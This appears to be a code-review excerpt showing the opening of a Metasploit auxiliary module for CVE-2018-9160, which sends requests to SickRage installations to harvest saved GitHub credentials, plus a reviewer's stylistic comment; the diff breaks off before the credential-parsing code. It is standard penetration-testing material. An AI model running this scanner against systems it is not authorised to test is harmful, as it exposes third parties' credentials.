modules/auxiliary/scanner/http/http_sickrage_password_leak.rb

```diff
@@ -0,0 +1,109 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'HTTP SickRage Password Leak',
+      'Description'    => %q{
+        SickRage < v2018-09-03 allows an attacker to view a user's saved Github credentials in HTTP responses unless the user has set login information for SickRage.
+        By default, SickRage does not require login information for the installation.
+      },
+      'Author'         =>
+      [
+        'Sven Fassbender', # EDB POC
+        'Shelby Pace'     # Metasploit Module
+      ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['CVE', '2018-9160'],
+          ['EDB', '44545']
+        ]
+    ))
+
+    register_options(
+    [
+      OptString.new('TARGETURI', [true, 'Optional path that gets prepended to the default paths to be searched', '/']),
+      OptPort.new('RPORT', [true, 'Target Port', 8081])
+    ])
+  end
+
+  def make_request(path)
+    uri = normalize_uri(target_uri.path + path)
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => uri
+    })
+
+    if res && res.code == 200
+      resHTML = res.get_html_document
+      get_creds(uri.split('/').last, resHTML)
+    else
+      print_error("Unable to reach #{uri}")
+    end
+  end
+
+  def is_valid?(user, pass)
+    if user == '' || pass == 'None'
```

Comment:
you can just return this line directly:

def is_valid?(user, pass)
    !(user == '' || pass == 'None')
end